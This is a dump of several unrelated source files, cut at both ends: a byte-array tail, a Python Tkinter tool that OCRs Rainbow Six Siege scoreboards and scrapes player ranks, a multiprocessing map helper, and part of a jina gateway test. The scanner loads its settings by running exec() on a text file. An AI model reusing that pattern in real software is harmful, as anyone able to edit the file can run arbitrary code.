0xfe,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x00,
0x00,0xfe,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,
0x00,0x00,0xfc,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x04,0x00,0x00,0xfc,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x06,0x00,0x00,0xf8,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x02,0x00,0x00,0xf8,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x03,0x00,0x00,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x80,0x01,0x00,0x00,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0xc0,0x3f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0xc0,0x3f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x80,0x7f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x00,0xff,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0x00,0x00,0x00,0xfe,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,
0xfe,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0e,0x00,0x00,0x00,
0x00,0xfc,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,
0x00,0x00,0xf8,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x03,0x00,
0x00,0x00,0x00,0xf0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x01,
0x00,0x00,0x00,0x00,0xe0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,
0x00,0x00,0x00,0x00,0x00,0xc0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x38,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0x07,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0x0f,0x00,0x00,0x00,
0x00,0x00,0x00,0xc0,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0x3f,0x00,0x00,
0x00,0x00,0x00,0x00,0xe0,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0x7f,0x00,
0x00,0x00,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,
0x01,0x00,0x00,0x00,0x00,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xff,0x07,0x00,0x00,0x00,0x00,0x80,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xfc,0x3f,0x00,0x00,0x00,0x00,0xf0,0x07,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xf0,0xff,0x01,0x00,0x00,0x00,0xfe,0x03,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xc0,0xff,0x0f,0x00,0x00,0xe0,0xff,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x01,0x00,0xff,0x1f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0xff,0xff,0xff,0x07,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0xff,0xff,0xff,0xff,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0xff,0xff,0x0f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x7f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};'
}
#Klasse für meine eigenen Ladezeichen
class my_rotating_icon(Canvas):
def __init__(self, master, size=50, speed=1, thickness=5, amount=3):
Canvas.__init__(self, master=master, width=2*size + (thickness*3.5) , height=2*size + (thickness*3.5))
self.amount = amount
self.speed = speed
self.a = []
self.b = []
self.start = 0
self.extent = 360/self.amount/2
self.thickness = thickness
self.size=size
self.x = size + (thickness*2)
self.y = size + (thickness*2)
for i in range(self.amount):
self.b.append(360/self.amount*i)
self.a.append(self.create_arc(self.x-self.size-self.thickness, self.y-self.size-self.thickness, self.x+self.size+self.thickness, self.y+self.size+self.thickness, fill="black", start=self.b[i], extent=self.extent))
self.create_oval(self.x-self.size, self.y-self.size, self.x+self.size, self.y+self.size, width=2, fill=self["bg"], outline="")
self.rotate()
def rotate(self):
self.start = self.start + 1
for i in range(self.amount):
self.itemconfig(self.a[i], start=self.start+self.b[i])
self.after(self.speed, self.rotate)
#Für die presets.txt Datei verantwortlich
class presets_txt:
def __init__(self):
self.path()
return
#Erstellt den Pfad zur presets.txt Datei (gleicher Ordner wie das Programm)
def path(self):
self.directory_path = os.path.dirname(os.path.abspath(__file__))
self.file_path = self.directory_path + "\\presets.txt"
return self.file_path
#Erstellt eine neue presets.txt Datei mit Standartwerten
def create_new(self):
presets_txt.path()
with open(file=self.file_path, mode="w") as self.file:
self.file.write("#In this file the settings for the R6S Scan programm are captured.\n")
self.file.write("#Everything that isn't commented out with a # will be executed with Python and may lead to errors if it isn't Python conform.\n")
self.file.write("#You can restore the default presets.txt with the programm by pressing the Explanation button and choosing the appropriate option afterwards")
self.file.write("or by deleting this file and starting the programm afterwards.\n")
self.file.write("#If you want to use '\\' instead of '/' in your paths you will have to use two ('\\\\') instead of one ('\\') otherwise Python will not recognize it.\n\n")
self.file.write("#Note that the tesseract software seems to have difficulties with paths that contain letters like ä,ö,ü,á,à,...")
self.file.write("#If something isn't working and you tried everything else try to rename the path.")
self.file.write("#the default directory for the screenshots (with a '/' or '\\\\' at the end):\n")
self.file.write("global default_dir\n")
self.file.write("default_dir = \"%USERPROFILE%/Videos/\"\n\n")
self.file.write("#tesseract.exe location:\n")
self.file.write("global tess_loc\n")
self.file.write("tess_loc = \"%ProgramFiles%/Tesseract-OCR/tesseract.exe\"\n\n")
self.file.write("#start the scanning process immediately after starting the programm (either True or False and without \"):\n")
self.file.write("global auto_start\n")
self.file.write("auto_start = False")
return
#Liest die presets.txt Datei aus und deren Variablen ein
def read_n_exec(self):
global default_dir
global tess_loc
try:
self.path()
with open(file=self.file_path, mode="r") as self.file:
self.file_content = self.file.read()
exec (self.file_content)
except FileNotFoundError:
self.create_new()
self.path()
with open(file=self.file_path, mode="r") as self.file:
self.file_content = self.file.read()
exec (self.file_content)
default_dir = environmental_var_or_not(default_dir)
tess_loc = environmental_var_or_not(tess_loc)
return
#Tooltips
class CreateToolTip(object):
'''
create a tooltip for a given widget
'''
def __init__(self, widget, text='widget info'):
self.widget = widget
#self.text = tk.StringVar()
#self.text.set(text)
self.text = text
self.widget.bind("<Enter>", self.enter)
self.widget.bind("<Leave>", self.close)
def enter(self, event=None):
x = y = 0
x, y, cx, cy = self.widget.bbox("insert")
x += self.widget.winfo_rootx() + 25
y += self.widget.winfo_rooty() + 20
# creates a toplevel window
self.tw = tk.Toplevel(self.widget)
# Leaves only the label and removes the app window
self.tw.wm_overrideredirect(True)
self.tw.wm_geometry("+%d+%d" % (x, y))
label = tk.Label(self.tw,
#textvariable=self.text,
text=get_rank(self.text.get()),
justify='left',
background='yellow', relief='solid', borderwidth=1,
font=("times", "8", "normal"))
label.pack(ipadx=1)
def close(self, event=None):
if self.tw:
self.tw.destroy()
#Testet ob der Pfad eine Umgebungsvariable enthält und gibt ihn ohne Umgebungsvariable zurück
def environmental_var_or_not(path):
no_environmental = path
path = path[::-1]
first_part = os.path.split(path)[1]
rest = os.path.split(path)[0]
rest = rest[::-1]
first_part = first_part[::-1]
if first_part[0] == "%" and first_part[-1] == "%":
first_part = first_part[1:]
first_part = first_part[:-1]
try:
final_path = os.environ.get(first_part) + "/" + rest
except TypeError:
final_path = no_environmental
else:
final_path = no_environmental
return final_path
#Explorer öffnen und Datei auswählen
def choose_file():
global label1
global Pic
#Pic = tk.filedialog.askopenfilename(title = "Select Image", filetypes = (("png files","*.png"),("all files","*.*")))
var = tk.filedialog.askopenfilename(title = "Select Image", filetypes = (("png files","*.png"),("jpg files","*.jpg"),("gif files","*.gif"),("all files","*")))
if var != "":
test_Pic.set(var)
test_Pic_kurz.set(ntpath.basename(test_Pic.get()))
create_img_and_tesseract(test_Pic.get())
show_image()
return
#Tkinter Callback-Funktion
def callback(name):
#webbrowser.open_new(url)
webbrowser.open_new("https://r6.tracker.network/profile/pc/" + name)
#Alle Websites öffnen
def open_all(urls):
for name in urls:
webbrowser.open_new(name)
return
#Window-Handle von R6S
def windowEnumerationHandler(hwnd, top_windows):
top_windows.append((hwnd, win32gui.GetWindowText(hwnd)))
#Macht R6S zum aktivem Fenster
def rainbow_top_window():
if __name__ == "__main__":
results = []
top_windows = []
win32gui.EnumWindows(windowEnumerationHandler, top_windows)
for i in top_windows:
if "rainbow" in i[1].lower():
results.append(i)
win32gui.ShowWindow(i[0],3)
break
#Automatischer Screenshot - nicht fertig
def auto_screenshot():
rainbow_top_window()
time.sleep(1)
pyautogui.hotkey("alt", "enter")
time.sleep(3)
screenshot = ImageGrab.grab()
pyautogui.hotkey("alt", "enter")
time.sleep(3)
im1_np = np.array(screenshot)
im2 = cv2.cvtColor(im1_np, cv2.COLOR_BGR2RGB)
return im2
#Dateinamen herausfinden (Geforce Experience)
def sort_and_reverse(directory):
list_of_files = []
for i in ('*.gif', '*.png', '*.jpg'):
list_of_files.extend(glob.glob(directory + i))
try:
last_file = max(list_of_files, key=os.path.getctime)
return last_file
except ValueError:
return
#Öffnet den Screenshot, schneidet ihn zu, liest den Text aus und erstellt die Links zu den SPielerprofilen
def create_img_and_tesseract(pic_dir):
global tk_img
global tk_img2
global new_output
global new_output_att
global new_output_def
global out_url
global out_att_url
global out_def_url
try:
#Richtigen Auschnitt herausschneiden
srcPic = cv2.imread(pic_dir, cv2.IMREAD_COLOR)
#srcPic.save("test.png")
height = np.size(srcPic, 0)
width = np.size(srcPic, 1)
y1 = round(450/1440*height)
y2 = round(1100/1440*height)
x1 = round(620/2560*width)
x2 = round(1200/2560*width)
att_pic = srcPic[y1:round(760/1440*height), x1:x2]
att_pic = cv2.bitwise_not(att_pic)
att_pic = Image.fromarray(att_pic, 'RGB')
def_pic = srcPic[round(790/1440*height):y2, x1:x2]
def_pic = cv2.bitwise_not(def_pic)
def_pic = Image.fromarray(def_pic, 'RGB')
srcPic = srcPic[y1:y2, x1:x2]
tk_img = srcPic
srcPic = cv2.bitwise_not(srcPic)
#Texterkennung
pytesseract.pytesseract.tesseract_cmd = tess_loc
#TESSDATA_PREFIX = r"C:\Program Files\Tesseract-OCR"
#output = pytesseract.image_to_string(srcPic, lang=None)
output_att = pytesseract.image_to_string(att_pic, lang=None)
output_def = pytesseract.image_to_string(def_pic, lang=None)
#Links erstellen und öffnen
new_output_att = []
out_att_url = []
output_att = output_att.split("\n")
for name in output_att:
if name != "" and name != " ":
url = "https://r6.tracker.network/profile/pc/" + name
new_output_att.append(name)
out_att_url.append(url)
new_output_def = []
out_def_url = []
output_def = output_def.split("\n")
for name in output_def:
if name != "" and name != " ":
url = "https://r6.tracker.network/profile/pc/" + name
new_output_def.append(name)
out_def_url.append(url)
except IndexError:
pass
return
#Zeigt das Scoreboard-Bild an
def show_image():
global check1_var
global tk_img
global tk_img2
global img_Label
global frame2
global main_window
try:
img_Label.destroy()
except NameError:
pass
if check1_var.get() == 0:
frame2.destroy()
frame2 = tk.Frame(master=main_window)
frame2.pack()
if check1_var.get() == 1:
try:
frame2.destroy()
frame2 = tk.Frame(master=main_window)
frame2.pack()
except NameError:
pass
try:
tk_img2 = cv2.resize(tk_img,(387,433))
b,g,r = cv2.split(tk_img2)
tk_img2 = cv2.merge((r,g,b))
#cv2.imshow("hi", tk_img2)
#cv2.waitKey(0)
tk_img2 = Image.fromarray(tk_img2)
tk_img2 = ImageTk.PhotoImage(image=tk_img2)
img_Label = tk.Label(master=frame2)
img_Label.pack()
img_Label.config(image=tk_img2)
except NameError:
img_Label = tk.Label(master=frame2)
img_Label.pack()
return
#Zeigt die Links zu den Spielerprofilen an
def show_links(*args):
global tk_img
global tk_img2
global img_window
global img_Label
global new_output
global new_output_att
global new_output_def
global out_url
global out_att_url
global out_def_url
global check1_var
global labels_name
global labels_att
global labels_def
global bu3
global labels_mmr_var
global loading_icon
try:
#alte Widgets zerstören
for i in range(10):
try:
labels_att[i].destroy()
except (UnboundLocalError, NameError, IndexError):
pass
try:
labels_def[i].destroy()
except(UnboundLocalError, NameError, IndexError):
pass
try:
labels_mmr[i].destroy()
except(UnboundLocalError, NameError, IndexError):
pass
try:
loading_icon[i].destroy()
except (UnboundLocalError, NameError, IndexError):
pass
try:
labels_mmr_tooltips[i].destroy()
except (UnboundLocalError, NameError, IndexError):
pass
for i in range(len(labels_mmr_var_att)):
labels_mmr_var_att[i].set("")
for i in range(len(labels_mmr_var_def)):
labels_mmr_var_def[i].set("")
#Ladezeichen platzieren
place_loading_icon()
#Textauslesefunktion starten
create_img_and_tesseract(test_Pic.get())
#Bild anzeigen
show_image()
place_loading_icon()
try:
bu3.destroy()
except (NameError):
pass
#Links erstellen und anzeigen
labels_name = []
labels_att = []
labels_def = []
labels_mmr = []
labels_mmr_tooltips = []
loading_icon = []
if 1==1:
label_name = tk.Label(master=frame1, text="Name")
label_name.grid(row=3, column=0, sticky=tk.E, padx=20)
label_mmr = tk.Label(master=frame1, text="MMR")
label_mmr.grid(row=3, column=1, sticky=tk.W, padx=20)
t1 = threading.Thread(target=set_mmr_var)
t1.start()
att_binding = []
for i in range(len(new_output_att)):
try:
if new_output_att[i] != "":
labels_att.append(tk.Label(master=frame1, text=new_output_att[i], fg="#0066cc", cursor="hand2"))
labels_att[i].grid(row=i+4, column=0, sticky=tk.E, padx=20)
att_binding.append(labels_att[i]["text"])
labels_mmr.append(tk.Label(master=frame1, textvariable=labels_mmr_var_att[i]))
labels_mmr[i].grid(row=i+4, column=1, sticky=tk.W, padx=20)
labels_mmr_tooltips.append(CreateToolTip(labels_mmr[i], labels_mmr_var_att[i]))
except IndexError:
pass
def_binding = []
for i in range(len(new_output_def)):
try:
if new_output_def[i] != "":
labels_def.append(tk.Label(master=frame1, text=new_output_def[i], fg="#CC6600", cursor="hand2"))
labels_def[i].grid(row=i+9, column=0, sticky=tk.E, padx=20)
def_binding.append(labels_def[i]["text"])
labels_mmr.append(tk.Label(master=frame1, textvariable=labels_mmr_var_def[i]))
labels_mmr[i+len(new_output_att)].grid(row=i+9, column=1, sticky=tk.W, padx=20)
labels_mmr_tooltips.append(CreateToolTip(labels_mmr[i+len(new_output_att)], labels_mmr_var_def[i]))
except NameError:
pass
try:
labels_att[0].bind("<Button-1>", lambda e: callback(att_binding[0]))
except IndexError:
pass
try:
labels_att[1].bind("<Button-1>", lambda e: callback(att_binding[1]))
except IndexError:
pass
try:
labels_att[2].bind("<Button-1>", lambda e: callback(att_binding[2]))
except IndexError:
pass
try:
labels_att[3].bind("<Button-1>", lambda e: callback(att_binding[3]))
except IndexError:
pass
try:
labels_att[4].bind("<Button-1>", lambda e: callback(att_binding[4]))
except IndexError:
pass
try:
labels_def[0].bind("<Button-1>", lambda e: callback(def_binding[0]))
except IndexError:
pass
try:
labels_def[1].bind("<Button-1>", lambda e: callback(def_binding[1]))
except IndexError:
pass
try:
labels_def[2].bind("<Button-1>", lambda e: callback(def_binding[2]))
except IndexError:
pass
try:
labels_def[3].bind("<Button-1>", lambda e: callback(def_binding[3]))
except IndexError:
pass
try:
labels_def[4].bind("<Button-1>", lambda e: callback(def_binding[4]))
except IndexError:
pass
#Alle öffnen
bu3 = tk.Button(master = frame1, text="Open all")
bu3.bind("<Button-1>", lambda e: open_all(out_url))
bu3.grid(row=i+11, column=0, columnspan=2)
return
except NameError:#
pass
#Erklärt das Programm in einem neuen Fenster (nicht fertig)
def explain():
explain_window = tk.Toplevel()
explain_window.title("How does it work?")
#explain_window.geometry('500x200')
l_header = tk.Label(master=explain_window, text="\nThis is the R6S Scoreboard Scanner.", font="Calibri 14", fg="red").pack()
l_text = tk.Label(master=explain_window, font="Calibri 12", borderwidth=20, wraplength=560, text="Its purpose is to scan an screenshot of a R6S scoreboard and give out links to every players profile.The stats are displayed on the https://r6.tracker.network/ website. \n\nBy default, the newest .png file in the default directory which can be defined in the presets.txt is chosen for getting scanned. You can choose another image to be scanned after the program started.\n\nThe program uses the Tesseract engine which you can download using the button below for scanning the images. The path to the tesseract.exe has to be defined in the presets.txt as well. \n\nIf the scanner isn’t working anymore because the presets.txt has been changed use the button below to create a new presets.txt with default settings.")
l_text.pack()
bu_presets = tk.Button(master=explain_window, font="Calibri 11", text="create new presets.txt", command=lambda: [presets_txt.create_new() and presets_txt.read_n_exec()])
bu_presets.pack()
bu_link = tk.Button(master=explain_window, text="tesseract ocr website", command=lambda: callback("https://digi.bib.uni-mannheim.de/tesseract/"))
bu_link.pack()
l_space = tk.Label(master=explain_window, text="\n").pack()
return
#Liest den aktuellen MMR-Wert eines Spielers aus
def read_out_website(link):
website = requests.get(link)
content = repr(website.text)
search_term = '<div class="trn-text--dimmed" style="font-size: 2rem;">'
search_term_length = len(search_term)
search_term_position = content.find(search_term)
var_margin = 5
MMR_string = content[search_term_position+search_term_length:search_term_position+search_term_length+var_margin]
MMR_string = str(re.sub("\D", "", MMR_string))
return MMR_string
#Festlegen der MMR Variablen
def set_mmr_var():
global labels_mmr_var
global labels_mmr_var_att
global labels_mmr_var_def
global out_url
global out_att_url
global out_def_url
for i in range(5):
try:
if read_out_website(out_att_url[i]) != "8":
labels_mmr_var_att[i].set(read_out_website(out_att_url[i]))
else:
labels_mmr_var_att[i].set("Error occured")
except IndexError:
pass
for i in range(5):
try:
if read_out_website(out_def_url[i]) != "8":
labels_mmr_var_def[i].set(read_out_website(out_def_url[i]))
else:
labels_mmr_var_def[i].set("Error occured")
except IndexError:
pass
return
#Platzieren der Ladezeichen
def place_loading_icon():
global loading_icon
global new_output_att
global new_output_def
loading_icon = []
for i in range(len(new_output_att)):
#loading_icon.append(Spinner1(frame1, size=24))
#loading_icon.append(my_rotating_icon(frame1, size=10, speed=6, thickness=2, amount=2))
#loading_icon[i].grid(row=i+4, column=1, sticky=tk.W, padx=27)
loading_icon.append(my_rotating_icon(frame1, size=10, speed=6, thickness=2, amount=2))
loading_icon[i].grid(row=i+4, column=1, sticky=tk.W, padx=27)
for i in range(len(new_output_def)):
loading_icon.append(my_rotating_icon(frame1, size=10, speed=6, thickness=2, amount=2))
loading_icon[i+len(new_output_att)].grid(row=i+9, column=1, sticky=tk.W, padx=27)
return
#Ausgewähltes Bild löschen
def delete_img():
os.remove(test_Pic.get())
test_Pic.set(sort_and_reverse(dir))
test_Pic_kurz.set(ntpath.basename(test_Pic.get()))
create_img_and_tesseract(test_Pic.get())
show_image()
#Tesseract nicht existent
def no_tesseract():
global tess_loc
pytesseract.pytesseract.tesseract_cmd = tess_loc
test_img = Image.new('RGB', (60, 30), color = 'red')
try:
test = pytesseract.image_to_string(test_img, lang=None)
except pytesseract.pytesseract.TesseractNotFoundError:
w = tk.Tk()
text = tess_loc + " is not installed or it's not in your path!"
l = tk.Label(text=text)
l.pack(padx=10, pady=10)
bu = tk.Button(master=w, text="Download tesseract for Windows", command=lambda: webbrowser.open_new("https://digi.bib.uni-mannheim.de/tesseract/"))
bu.pack(padx=10, pady=10)
w.mainloop()
sys.exit(0)
#Rank herausfinden
def get_rank(rank):
for i in range(len(ranks1)):
try:
if float(rank) <= float(ranks1[i]):
return ranks2[ranks1[i]]
except ValueError:
pass
return "DIAMOND"
#-----------------------------
#Code der tatsächlich ausgeführt wird
#-------------------------------------------
#Variablen festlegen
presets_txt = presets_txt()
presets_txt.read_n_exec()
dir = default_dir
ranks1 = [1399, 1499, 1599, 1699, 1799, 1899, 1999, 2099, 2199, 2299, 2399, 2499, 2699, 2899, 3099, 3299, 2399, 2499, 2699, 2899, 3099, 3299, 3699, 4099, 4499]
ranks2 = {1399: 'COPPER IV', 1499: 'COPPER III', 1599: 'COPPER II', 1699: 'COPPER I', 1799: 'BRONZE IV', 1899: 'BRONZE III', 1999: 'BRONZE II', 2099: 'BRONZE I', 2199: 'SILVER IV', 2299: 'SILVER III', 2399: 'SILVER II', 2499: 'SILVER I', 2699: 'GOLD IV', 2899: 'GOLD III', 3099: 'GOLD II', 3299: 'GOLD I', 3699: 'PLATINUM III', 4099: 'PLATINUM II', 4499: 'PLATINUM I'}
no_tesseract()
#Tkinter Fenster und Widgets
main_window = tk.Tk()
main_window.title("R6S Scoreboard Scanner")
#Dynamische Variablen
test_Pic = tk.StringVar()
test_Pic_kurz = tk.StringVar()
test_Pic.set(sort_and_reverse(dir))
test_Pic_kurz.set(ntpath.basename(test_Pic.get()))
labels_mmr_var = []
for i in range(10):
labels_mmr_var.append(tk.StringVar())
labels_mmr_var_att = []
for i in range(5):
labels_mmr_var_att.append(tk.StringVar())
labels_mmr_var_def = []
for i in range(5,10):
labels_mmr_var_def.append(tk.StringVar())
create_img_and_tesseract(sort_and_reverse(dir))
frame1 = tk.Frame(master=main_window)
frame1.pack(side=tk.LEFT)
label1 = tk.Label(master=frame1, bd=10, font="Segoe 10", fg="blue", cursor="hand2", textvariable=test_Pic_kurz)
label1.grid(row=0, column=0, columnspan=2)
label1.bind("<Button-1>", lambda e: choose_file())
bu_del = tk.Button(master=frame1, text="Delete", command=delete_img)
bu_del.grid(row=0, column=2, sticky=tk.W, padx=20)
check1_var = tk.IntVar()
check1 = tk.Checkbutton(master=frame1, text="Show Scoreboard", variable=check1_var, font="Segoe 10")
check1.grid(row=1, column=0, columnspan=2)
check1.select()
bu1 = tk.Button(master=frame1, text="Run", command=show_links)
bu1.bind("<Return>", show_links)
bu1.focus_set()
bu1.grid(row=2, column=0, sticky=tk.E, padx=20)
bu2 = tk.Button(master=frame1, text="Explanation", command=explain)
bu2.grid(row=2, column=1, sticky=tk.W, padx=20)
frame2 = tk.Frame(master=main_window)
frame2.pack(side=tk.RIGHT)
show_image()
if auto_start == True:
show_links()
main_window.mainloop()
|
fast_map.py
|
''' It's my first python package.
You may notice it's somewhat not very presentable for public release.
But it seems to do the thing. '''
import multiprocessing as mp
# from multiprocessing.dummy import Pool as ThreadPool
from concurrent.futures import ThreadPoolExecutor
import math
# from itertools import repeat
from functools import partial
from threading import Thread
import time
# import psutil
def process_chunk(proc_id, f, threads_count, task_queue, result_queue):
# print('start proc id', proc_id, ' cpu core=',psutil.Process().cpu_num())
futures = []
def on_completed(future, index):
res = future.result()
# print('on_completed, res=', res)
result_queue.put((index, res))
with ThreadPoolExecutor(max_workers=threads_count) as executor:
while True:
i, item = task_queue.get()
task_queue.task_done()
if item == None:
break
future = executor.submit(f, *item)
future.add_done_callback(partial(on_completed, index=i))
# print('end proc id', proc_id, ' cpu core=', psutil.Process().cpu_num())
def calculate_procs_and_threads_per_process(threads_limit, tasks_count):
''' threads_limit = total threads limit (e.g. if equal to 8 then on a 4 core
cpu, 2 threads will be spawned in each process) '''
procs_count = mp.cpu_count()
if tasks_count < procs_count:
procs_count = tasks_count
if threads_limit and threads_limit < procs_count:
procs_count
# chunk to be processed by a single process
chunk_size = math.ceil(tasks_count / procs_count)
threads_pp = chunk_size # threads per process
if threads_limit:
threads_pp = min(threads_pp, math.ceil(threads_limit/procs_count))
# print("threads_pp =", threads_pp)
return procs_count, threads_pp
def fast_map(f, *v, threads_limit=None, forced_procs_count=None):
''' threads_limit = total threads limit (e.g. if equal to 8 then on a 4 core
cpu, 2 threads will be spawned in each process) '''
def enqueuer(queues, values, none_count):
for i, val in enumerate(zip(*values)):
# print('enqueue', i, val)
queues[i % len(queues)].put((i,val))
for q in queues:
q.put((None,None))
tasks_count = len(v[0])
procs_count, threads_pp = calculate_procs_and_threads_per_process( threads_limit, tasks_count )
# forced_procs_count is just for testing (not indended to be a feature)
if forced_procs_count:
procs_count = forced_procs_count
task_queues = [mp.JoinableQueue() for _ in range(procs_count)] # multiple queues for the sake of even distribution
result_queue = mp.Queue()
procs = []
for i in range(procs_count):
p = mp.Process(target=process_chunk, args=[i, f, threads_pp, task_queues[i], result_queue])
procs.append(p)
p.start()
Thread(target=enqueuer, daemon=True, args=[task_queues, v, procs_count]).start()
expected_index = 0
ordered_results = {} # key=index val=result
while True:
alive_procs = [p for p in procs if p.is_alive()]
if result_queue.empty() and len(alive_procs) == 0:
return
while not result_queue.empty():
i, res = result_queue.get()
if i != expected_index:
ordered_results[i] = res
continue
yield res
expected_index += 1
while ordered_results.get(expected_index, None):
yield ordered_results.pop(expected_index)
expected_index += 1
if expected_index == tasks_count:
return
if __name__ == '__main__':
pass
|
test_clients_gateways.py
|
import asyncio
import copy
import multiprocessing
import time
from typing import Dict
import pytest
from jina import Document, DocumentArray
from jina.helper import random_port
from jina.parsers import set_gateway_parser
from jina.serve import networking
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
from jina.types.request.data import DataRequest
@pytest.fixture
def linear_graph_dict():
return {
'start-gateway': ['pod0'],
'pod0': ['pod1'],
'pod1': ['pod2'],
'pod2': ['pod3'],
'pod3': ['end-gateway'],
}
@pytest.fixture
def bifurcation_graph_dict():
return {
'start-gateway': ['pod0', 'pod4', 'pod6'],
'pod0': ['pod1', 'pod2'],
'pod1': [], # hanging_pod
'pod2': ['pod3'],
'pod4': ['pod5'],
'pod5': ['end-gateway'],
'pod3': ['pod5'],
'pod6': [], # hanging_pod
}
@pytest.fixture
def merge_graph_dict_directly_merge_in_gateway():
return {
'start-gateway': ['pod0'],
'pod0': ['pod1', 'pod2'],
'pod1': ['merger'],
'pod2': ['merger'],
'merger': ['end-gateway'],
}
@pytest.fixture
def merge_graph_dict_directly_merge_in_last_pod():
return {
'start-gateway': ['pod0'],
'pod0': ['pod1', 'pod2'],
'pod1': ['merger'],
'pod2': ['merger'],
'merger': ['pod_last'],
'pod_last': ['end-gateway'],
}
@pytest.fixture
def complete_graph_dict():
return {
'start-gateway': ['pod0', 'pod4', 'pod6'],
'pod0': ['pod1', 'pod2'],
'pod1': ['merger'],
'pod2': ['pod3'],
'pod4': ['pod5'],
'merger': ['pod_last'],
'pod5': ['merger'],
'pod3': ['merger'],
'pod6': [], # hanging_pod
'pod_last': ['end-gateway'],
}
class DummyNoDocAccessMockConnectionPool:
def send_requests_once(
self, requests, pod: str, head: bool, endpoint: str = None
) -> asyncio.Task:
async def task_wrapper():
import random
await asyncio.sleep(1 / (random.randint(1, 3) * 10))
if requests[0].is_decompressed:
return (
DataRequest(request=requests[0].proto.SerializePartialToString()),
{},
)
else:
return DataRequest(request=requests[0].buffer), {}
return asyncio.create_task(task_wrapper())
class DummyMockConnectionPool:
def send_requests_once(
self, requests, pod: str, head: bool, endpoint: str = None
) -> asyncio.Task:
assert head
request = requests[0]
response_msg = copy.deepcopy(request)
new_docs = DocumentArray()
docs = request.docs
for doc in docs:
clientid = doc.text[0:7]
new_doc = Document(text=doc.text + f'-{clientid}-{pod}')
new_docs.append(new_doc)
response_msg.data.docs = new_docs
async def task_wrapper():
import random
await asyncio.sleep(1 / (random.randint(1, 3) * 10))
return response_msg, {}
return asyncio.create_task(task_wrapper())
def create_runtime(
graph_dict: Dict, protocol: str, port_in: int, call_counts=None, monkeypatch=None
):
import json
graph_description = json.dumps(graph_dict)
runtime_cls = None
if call_counts:
def decompress(self):
call_counts.put_nowait('called')
from jina.proto import jina_pb2
self._pb_body = jina_pb2.DataRequestProto()
self._pb_body.ParseFromString(self.buffer)
self.buffer = None
monkeypatch.setattr(
DataRequest,
'_decompress',
decompress,
)
if protocol == 'grpc':
runtime_cls = GRPCGatewayRuntime
elif protocol == 'http':
runtime_cls = HTTPGatewayRuntime
elif protocol == 'websocket':
runtime_cls = WebSocketGatewayRuntime
with runtime_cls(
set_gateway_parser().parse_args(
[
'--port-expose',
f'{port_in}',
'--graph-description',
f'{graph_description}',
'--pods-addresses',
'{}',
]
)
) as runtime:
runtime.run_forever()
def client_send(client_id: int, port_in: int, protocol: str):
from jina.clients import Client
c = Client(protocol=protocol, port=port_in)
# send requests
return c.post(
on='/',
